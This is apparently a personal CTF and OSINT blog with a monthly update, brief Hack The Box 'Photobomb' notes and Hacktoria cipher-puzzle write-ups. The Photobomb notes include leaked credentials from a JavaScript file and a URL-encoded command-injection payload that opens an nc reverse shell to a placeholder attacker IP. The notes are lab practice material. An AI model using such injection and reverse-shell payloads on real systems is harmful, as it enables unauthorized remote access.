Whoa! No updates?

I promised myself I'd stick with updating this blog and then I went a whole month without posting. So in lieu of a proper post, notes, or a write-up of some adventurous CTF undertaking, here's a brief post of what I've been up to when I wasn't posting. Not that anyone's waiting around for it, but I figure this is just me being polite :)

The highlight of the last month for me was definitely the TraceLabs Global OSINT Search Party. This is a CTF where players find information on the web about active missing persons cases and attempt to aggregate as much information on the disappearance as possible. The competition was on February 11th, and lasted 4 hours. I was on one of three teams representing Hacktoria. My team put forth a valiant effort and came in the top 100.

 

One of the other Hacktoria teams took home the gold, claiming first prize. Another team still was able to find alternate socials for one of the missing persons, and were able to advance the case. When I started learning to do this kind of stuff I never imagined it would take me to experiences like this.

Another big preoccupation for the month was the Hacktoria monthly contract 'Operation: Nemesis' which I managed to solve just before the month was done and the contract was closed. There was a brutal geolocation challenge towards the end of this one that took me many hours to figure out. I have a write-up for this one incoming. More recently with the help of some of my fellow Hacktorians I also took on 'Operation: Wiretap' the active monthly challenge there now.

Other than that I have been chomping away at hacking machines on hackthebox and tryhackme, my two favorite resources for computer based extreme sports. Looking forward to the upcoming HacktheBox Cyber Apocalypse CTF in just a couple weeks starting on March 18th. 

Here's some links:

https://www.tracelabs.org/

https://www.hackthebox.com/events/cyber-apocalypse-2023?utm_source=mp&utm_medium=banner&utm_campaign=cyber_apocalypse_2023

https://hacktoria.com/operations/operation-wiretap/

Notes for Photobomb on Hackthebox

Just some notes for Photobomb on Hackthebox, not a proper walkthrough.

PHOTOBOMB notes -->

nmap -sC -sV -O IP ADDRESS

PORT   STATE SERVICE VERSION

22/tcp open  ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)

|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)

|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)

80/tcp open  http nginx 1.18.0 (Ubuntu)

|_http-title: Did not follow redirect to http://photobomb.htb/

|_http-server-header: nginx/1.18.0 (Ubuntu)

added photobomb.htb to hosts

/photobomb.js link from backend of landing page

function init() {

  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me

  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {

document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');

  }

}

window.onload = init;

captured post request from image download function of /printer

command injection on filetype=

first payload attempt:

jpg;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%20YOURIPHERE%209001%20%3E%2Ftmp%2Ff

it works

b8a88548a8d68cf83f9203cf********

$ sudo -l

Matching Defaults entries for wizard on photobomb:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:

(root) SETENV: NOPASSWD: /opt/cleanup.sh

From there the path to root is clear.

Writeup: The Archive - Hacktoria Contract

 

Writeup: The Archive - Hacktoria Contract

 

Here's my writeup for the Hacktoria Contract "The Archive" which dropped on December 16, 2022 and I solved on Dec 28th.

Briefing

Greetings Special Agent K. As you might know, the end of the year is always signified with a massive uptick in cyber attacks. Particularly DDoS and Ransomware attacks are commonplace during this time of the year. It’s also the time of the year for agencies worldwide, to crack down on the criminal enterprises destroying the downtime of IT personnel everywhere.

Our good friends over at the FBI have done just that. Yesterday morning around 0400 UTC they were able to seize a warehouse full of C2 servers, crypto miners and an entire scam call-center rolled int one.

During this bust, several laptops of key individuals were confiscated. There was however one laptop of which the owner was able to wipe the disk, right as the raid was happening. The FBI was able to recover most of the files, but is left puzzled at several of them.

You might already feel this one coming. One of these archives was sent our way to be investigated. Find out what you can about the file inside the archive. It seems to have been damaged beyond the point of recovery, but the FBI has hopes our best and brightest can uncover something.

As always, Special Agent K. The contract is yours, if you choose to accept.

Materials and Answer Instruction

The password starts with “flag-“

MD5 Checksum for The Archive: 2625ae7c180080e580551347831362d7

—---------

And so with very little to start with as usual, I downloaded the archive file and after extracting psvoxkwo8mm took a look at it in the terminal to find a huge heap of text.

The text doesn’t jump out to me as anything in particular at first glance. At this point I’m thinking this is probably a trap of some kind, so I should probably look elsewhere. Taking into account what we have so far: the checksum, the filename, and the string of text in the file itself. I take the hash over to https://hashes.com/ and https://www.dcode.fr/cipher-identifier but have no luck playing around with it in there. My next move is to play around with the filename of the archive file. Running this through dcode bears fruit rather quickly:

As it identifies the text as encoded in the Affine Cipher. Filename8cc seems to be something useful, but I’m not immediately sure of its meaning. At this point its time for some strategic googling, which yields nothing. 

After a while I figure out its a url, filename.cc. When I visit the site I immediately get a download in my browser for a file named “passarch-mf28f2ukn2vh723f2f23” which holds a file “password-the archive”, and that seems rather promising! So, we open that up and viola! The flag for our file flag-****398D#C*$C#)*$V3405hv3j524952

So we head on over to our flag file, using that as our password and boom! We got the contract card.

Hacktoria Sleeper Cell Writeup

@@@@@@

The Sleeper Cell is a new Hacktoria Contract which just dropped today. When we check out our initial intel we are greeted with a prologue about a nihilistic and violent anti-human terror cell. Each time I begin a contract I take all of my initial data from the briefing and put it in one place, so let us do that here: 

 

@@@@@@ 

Greetings, Special Agent K.

We have an urgent matter on our hands. For several months we’ve been investigating a group called “Androktasiai”. A radical organization who believes in cleansing the planet of what they call gluttony. Believing firmly that humans are a disease that needs to be exterminated, this radical group is well organized and is preparing to strike several targets.

After breaching one of their email accounts, we were able to extract a sent item. The metadata didn’t prove to be of much help, as it was sent to a disposable 10minutemail address.

The contents however are of great interesting. We believe it contains instructions sent from one of the groups’ leaders to a sleeper cell. This sleeper cell will now be activated and preparing to carry out an attack somewhere.

It is your task to figure out what the text means and provide any intelligence about the plans of this organization.

As always, Special Agent K. The Contract is yours, if you choose to accept.

The password will be in the follow format: ((this-is-the-flag))

Include the (( )) in the password as well.

Recovered e-mail text:

SSB1cmdzIG9rZSBscGlhIHR2cHYgbXluIGhzZGUgaWxlaHJyaSB5b212ZCB3dWcgZXAgaHJ4IHdnemRhIGF5dXZvbnIgc2h3a21uICh2aSBwY2UgdHJ3IHZvYiBtYnZrIHJlZWwsIGFvbndybnFrLCBveHcgZmd3bHFzdSkgd3lzIG14cmxpaXYgbW53a3NiIGhmIGxwZSB0ZW51ZXNuIEloYXRvYW9ja3ZmYyB1bHdhc21kIGZ3ZmJvLCBwaHd6ZXduIE5vdHZvZnkgb3dyc3MsIGprenpvIHBlIHd2ZG1haXJpIGh5IGllam5la3QgZ2t2IHd3aWVqbmVrdCwgbnF1IGhydHQgb3F0cCB0dWxldWMgZm9qbSB0cGVhIHN2ZnB4Y2wuIElubCBmYnUga3ZrbSBuc2J1emUgdWRqIHJvZWlubXJtZCBodiBrdm8gYm1obXJuZXB3IGZidnIgd2FiaCBiaHIgc3ZmcHhjbCwgcXQgcXMgYnhpIGRra3QgbHcgbWlrciB3eXMgd3R0bG1yIChxbiBna3YgdHlrbXd6IENwYWN3dmZjIHdldXRhemVxIHhlaHkgbnMpIGV3cm0gdHVoZSBkb2tmd2t0IGp5IGJ4aSBvYm1peHFjcWF5IG9ycHlrLiBBZmwgaW4gd3IgbmVjZyBnb2wgYmhtIG1ucWVzYiBoZiBvd3JzaWFqLCBudmttIGlrIGJobSBjbnhqcyBkYWFsIGVlIGxvIGFyayBnb3ggaGdlIG5pdGh1diAoa3JiY3ogd2YgdG9haiBrd3d4IGhzYSBwbXJzaHRob3cgbXdiYXRzKSBxcnZnIG1obmxxbmNheW9wIGt5a2shIFZ3IHdtIG5idyBqc28sIG1oc2IgaXYgdHVoIER3eHhzIGxwcnd1dGsga3ZvIHZvZmJpdnVubyB5c2ttIHR6aXQgcXMgdnEga3ZvIGZvbXZ0aWlhdiBrdm9rZWduLCB0cGUgdHVmZ2NnZWthIG9uIHdud3ZmIHNsIHNnIGxla29wd3ZyIGtnZCBscGlra3JxdnIsIGRhYWwgcW4ga29hd3piZXRudW0gb24gdHZwdiB3ZCB1ZXV3bW1zIE51eHN4bS12YWRlPyBJbnEgd3lvZCBoZiBscGUgbmFncXZnYyBoZiBscGUgbWFld3kgaHJrb21vaCBiaHIgdnJhbyBhZXNiIGF2ZCBxaHRjbW1pZ3YsIFNjbGNrbGYgc2wgZWZvZXZkcnV2ciEgS2dkIGxwYWIgdHV1ZmlxYSB0em0gc2ltciBrdm9kIHBpbHBvY3QgdnFrc2JmaWthaXduIHByZWhzZ3V3bCBpdiB0dWhkLCBvdmUgbXdiYXRzIG51diBzeHplZmxlemVxIHJ3IGhyeG0gc2tjd3JxbGV1IGRoIHR6bWl6IHBodXpoaSB0bnYgcW14dWVsa20/IGtnZCBscGFiIG5ud2xmbyB3b3dhIGJnIGRyZmZxZGJvZiBpbHduciBzdmZweGNsIHdyIHVheGggcnp2IGZlbGlsYSwgYWYgenZ6diBpZWpuZWt0IG52IHphenhyeG1jYj8gMCBla3dpc3d4IG1zbG5tc2YhIHp5b2QsIEIgcGppeSBnb2gsIGZmYmNtcnNxbmEgeWJ4IGtjIGN4ZWMgYm8geGVlaXZxZCBtaHcgbm96ZWZkenIgZGFpZm9zIGp5IGZ3aW94emUgZW1saW5wa2Z6c3ZhZCBpbmwgZm5xa29jbWl1aWwgemV0bGRzeG1zISBzYSBvdmUgZmRwZzogR2hlIGx3IHl3dSBna3JoIGdibGQgd3ZtcnByZHMgeHR0bXplLCBpbnEgcHJ5byBmZWxpbGEgbWJ1diBocnhuIGhtcm5lcHcgc20gayBnZW8gemVvaXpoZWgsIHlrIHdnemsgYXBleGV1IHBrb2UgZ29jciBiemUgZ29nc3d0ZWFzIG91cnd4bC4gR2dsIGhpcyB0bG1zeCBtbyBmaXRjcnIgZCBqaGJ0aXlwdCBlYWwsIHdmIGtzbSwgY2d2dHFuaGRjIHF5Z2Nna3Rxb2EsIGRlciBpaHUgZHFrbSBmYnJjZyBueHNocXNtIGlnLCByaSBzdmxlIGN2b2UgaWcgcWZoLiAoKENoRmEtQXRpZHZ4ZC0zMy45NTM0MTcsLTExOC4zMzg4NjMsMTgpKSBPcXRpZiwgbml6ZSBucXUgT2podCwgc3plIGF1c2l6cXN4bmwgbm96IHlieC4gUmJuIGJuIHN2b2JocnUgZ3prdmUsIFptYWIgcHJ1d3NtbXMgc3RsIGJodnF4Zy4gS2dkIHd0c213dWhpcywgY3hlLCBrbWUsIGFlciwgZGVyIGx4IG5nYiB3bWFlYi4gUmJuIGJuIHN2b2JocnUgZ3prdmUsIGRtdCBnb2h1IHd3YnggYncgb2V2dHloLCByYm4geGFrZywgd3BpcGsgc3NzZ2cgc3R3aXlmIGhoaWtlLCBtc2cgY3duZ2xlaW8gdXVqdml2ZzogbnF1IHpvbSBpbCB2b2IgaWFmaXNrbGUsIHh3ciBxZiB2dyB1Y29sLCB5Z2Mgc3BheW8gamlweWVqIG9ybWFnIG9mZ2MuIFRudiBxbiBpbmJ3eXNiIGlsc2tlLCBTbmJ6IHBjZSBtaHNiIGl2IG9haCBrdnNnZywgbHcgd3F0LCBna3YgZ2RobncsIGp5IHduciB6cm0sIGRoIHdhYiwgZG1jYmZrd3lnLCBhZmwgaXYgb2FoIG1zY2xlZCBiaG0gd3VyY3Mgd3RzbG1yZyBpZiBzdmZwaHJlbWQuIElucSBsZSBveGh0em1yIHhsbmZ2LCBka21pd3Z0dHksIG5xdSBxeWd0YXZ1aWx5YiwgcmJuIGJuIHN2b2JocnUgZ3prdmUsIHl6aXZkIHZ3IGpzZnhuIGxxbW1zLiBOcXUgd3ggdG5nYmhtciBjb3JxbywgQnQgYWEgZ3pvaHF1IGtzbWggeHFybSwgQWFnIHpiIGtnb2xwZXogcHlkdHMsIGRhaWsgZW96ayB2diBtc2JyIGxhc2UgYm8gZ2t2IHFieGFscW92IG9zIHByYjogcGhyIHNhIHRwZSBWcXdveG0gaWYgYmhtIGJyanpieGJueSBxcyB2b2h1emdyeGQgb3F0cCBsdmp5aCB3eGFsYSwgYmN0IGdrdiBweWdlayBqZXFudCB2a2ZvZ2dscGV2ZXEgenpociBsdGp3bm9lZTogdmYgaHJicyBlaXNiZWViIHJ6Y2gsIGZhenNiIGlnIHBsZ2QgYWFubSBhdiBlbnZwIHRza2UsIG9wZXplb2IgbnMgd25zbCBpbGVhbHYgbmNiZCBpZiBtdm1ybCBoamdvZ2N3IHdmIGxlcHJ0aHNobi4gU3ZkIGJoYnh4diBneCBhZGVhZ3MgZnN2b3UgaGYgcyBvZXZ0eWggd3dieCwgeXdiIGl2IHRleGt2LCBneCB0enFucyB0dWRrIHd4IHpvbm1ydmlhaiBrdm8gcG9qcywgdHBlIHNsaXMgd25zbCBpbGVhbHYgc20gdmJ0bHRlIGlucSBvemhkZWUgdG0gaXZjZWhyZ293IGFmbCBhY2d6aGVob3cgdWZibyBiaHIgaGVyLg==

@@@@@@

Now upon first glance what we appear to have here is a heavy chunk of encoded text. My suspicion initially is that the text is Base64 encoded. Base64 is a group of encoding schemes with a number of applications in the real world, and is seen often in cryptography challenges. I drop the chunk of text into https://www.dcode.fr to confirm that it’s B64, and it is in fact encoded in this way. However; this does not give us the answer as our decoded output is still not readable.

I urgs oke lpia tvpv myn hsde ilehrri yomvd wug ep hrx wgzda ayuvonr shwkmn (vi pce trw vob mbvk reel, aonwrnqk, oxw fgwlqsu) wys mxrliiv mnwksb hf lpe tenuesn Ihatoaockvfc ulwasmd fwfbo, phwzewn Notvofy owrss, jkzzo pe wvdmairi hy iejnekt gkv wwiejnekt, nqu hrtt oqtp tuleuc fojm tpea svfpxcl. Inl fbu kvkm nsbuze udj roeinmrmd hv kvo bmhmrnepw fbvr wabh bhr svfpxcl, qt qs bxi dkkt lw mikr wys wttlmr (qn gkv tykmwz Cpacwvfc weutazeq xehy ns) ewrm tuhe dokfwkt jy bxi obmixqcqay orpyk. Afl in wr necg gol bhm mnqesb hf owrsiaj, nvkm ik bhm cnxjs daal ee lo ark gox hge nithuv (krbcz wf toaj kwwx hsa pmrshthow mwbats) qrvg mhnlqncayop kykk! Vw wm nbw jso, mhsb iv tuh Dwxxs lprwutk kvo vofbivuno yskm tzit qs vq kvo fomvtiiav kvokegn, tpe tufgcgeka on wnwvf sl sg lekopwvr kgd lpikkrqvr, daal qn koawzbetnum on tvpv wd ueuwmms Nuxsxm-vade? Inq wyod hf lpe nagqvgc hf lpe maewy hrkomoh bhr vrao aesb avd qhtcmmigv, Sclcklf sl efoevdruvr! Kgd lpab tuufiqa tzm simr kvod pilpoct vqksbfikaiwn prehsguwl iv tuhd, ove mwbats nuv sxzeflezeq rw hrxm skcwrqleu dh tzmiz phuzhi tnv qmxuelkm? kgd lpab nnwlfo wowa bg drffqdbof ilwnr svfpxcl wr uaxh rzv felila, af zvzv iejnekt nv zazxrxmcb? 0 ekwiswx mslnmsf! zyod, B pjiy goh, ffbcmrsqna ybx kc cxec bo xeeivqd mhw nozefdzr daifos jy fwioxze emlinpkfzsvad inl fnqkocmiuil zetldsxms! sa ove fdpg: Ghe lw ywu gkrh gbld wvmrprds xttmze, inq pryo felila mbuv hrxn hmrnepw sm k geo zeoizheh, yk wgzk apexeu pkoe gocr bze gogswteas ourwxl. Ggl his tlmsx mo fitcrr d jhbtiypt eal, wf ksm, cgvtqnhdc qygcgktqoa, der ihu dqkm fbrcg nxshqsm ig, ri svle cvoe ig qfh. ((ChFa-Atidvxd-33.953417,-118.338863,18)) Oqtif, nize nqu Ojht, sze ausizqsxnl noz ybx. Rbn bn svobhru gzkve, Zmab pruwsmms stl bhvqxg. Kgd wtsmwuhis, cxe, kme, aer, der lx ngb wmaeb. Rbn bn svobhru gzkve, dmt gohu wwbx bw oevtyh, rbn xakg, wpipk sssgg stwiyf hhike, msg cwngleio uujvivg: nqu zom il vob iafiskle, xwr qf vw ucol, ygc spayo jipyej ormag ofgc. Tnv qn inbwysb ilske, Snbz pce mhsb iv oah kvsgg, lw wqt, gkv gdhnw, jy wnr zrm, dh wab, dmcbfkwyg, afl iv oah mscled bhm wurcs wtslmrg if svfphremd. Inq le oxhtzmr xlnfv, dkmiwvtty, nqu qygtavuilyb, rbn bn svobhru gzkve, yzivd vw jsfxn lqmms. Nqu wx tngbhmr corqo, Bt aa gzohqu ksmh xqrm, Aag zb kgolpez pydts, daik eozk vv msbr lase bo gkv qbxalqov os prb: phr sa tpe Vqwoxm if bhm brjzbxbny qs vohuzgrxd oqtp lvjyh wxala, bct gkv pygek jeqnt vkfogglpeveq zzhr ltjwnoee: vf hrbs eisbeeb rzch, fazsb ig plgd aanm av envp tske, opezeob ns wnsl ilealv ncbd if mvmrl hjgogcw wf leprthshn. Svd bhbxxv gx adeags fsvou hf s oevtyh wwbx, ywb iv texkv, gx tzqns tudk wx zonmrviaj kvo pojs, tpe slis wnsl ilealv sm vbtlte inq ozhdee tm ivcehrgow afl acgzhehow ufbo bhr her.

Seems like a bunch of nonsense, right? Well a quick glance we can see some text that resembles our expected password format. So I drop this encoded text into decode.fr as well. The site recognizes the text as encrypted with the Vigenère cipher, another cipher format that CTF players may be familiar with as it tends to show up from time to time. From Wikipedia: The Vigenère cipher is a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers, based on the letters of a keyword. So, all we should need to decrypt this text is a keyword. Where would we find something like that? Well, lets again take a look at our source intel: we know that we are investigating a terror group, so could it be something so simple as the name of the organization? Worth a shot. In decode.fr I analyze the encrypted text using Androktasiai as the keyword for the Vigenère cipher, and this turns out to be the correct key. We get the decrypted output: 

I hope ere this time you have already found out by the words already spoken (if you are not most dull, ignorant, and foolish) the certain matter of the learned Philosophers blessed stone, whereon Alchemy works, while we endeavor to perfect the imperfect, and that with things more then perfect. And for that nature has delivered us the imperfect only with the perfect, it is our part to make the matter (in the former Chapters declared unto us) more then perfect by our artificial labor. And if we know not the manner of working, what is the cause that we do not see how nature (which of long time has perfected metals) does continually work! Do we not see, that in the Mines through the continual heat that is in the mountains thereof, the grossness of water is so decocted and thickened, that in continuance of time it becomes Argent-vive? And that of the fatness of the earth through the same heat and decoction, Sulphur is engendered! And that through the same heat without intermission continued in them, all metals are engendered of them according to their purity and impurity? and that nature does by decoction alone perfect or make all metals, as well perfect as imperfect? 0 extreme madness! what, I pray you, constrains you to seek to perfect the foresaid things by strange melancholical and fantastical regiments! as one says: Woe to you that will overcome nature, and make metals more then perfect by a new regiment, or work sprung from your own senseless brains. God has given to nature a straight way, to wit, continual concoction, and you like fools despise it, or else know it not. ((SoFi-Stadium-33.953417,-118.338863,18)) Again, fire and Azot, are sufficient for you. And in another place, Heat perfects all things. And elsewhere, see, see, see, and be not weary. And in another place, let your fire be gentle, and easy, which being always equal, may continue burning: and let it not increase, for if it does, you shall suffer great loss. And in another place, Know you that in one thing, to wit, the stone, by one way, to wit, decoction, and in one vessel the whole mastery is performed. And in another place, patiently, and continually, and in another place, grind it seven times. And in another place, It is ground with fire, And in another place, this work is very like to the creation of man: for as the Infant in the beginning is nourished with light meats, but the bones being strengthened with stronger: so this mastery also, first it must have an easy fire, whereby we must always work in every essence of decoction. And though we always speak of a gentle fire, yet in truth, we think that in governing the work, the fire must always by little and little be increased and augmented unto the end.

And thus our password:

((SoFi-Stadium-33.953417,-118.338863,18)) 

 

:D 

https://hacktoria.com/contracts/the-sleeper-cell/
https://www.dcode.fr/vigenere-cipher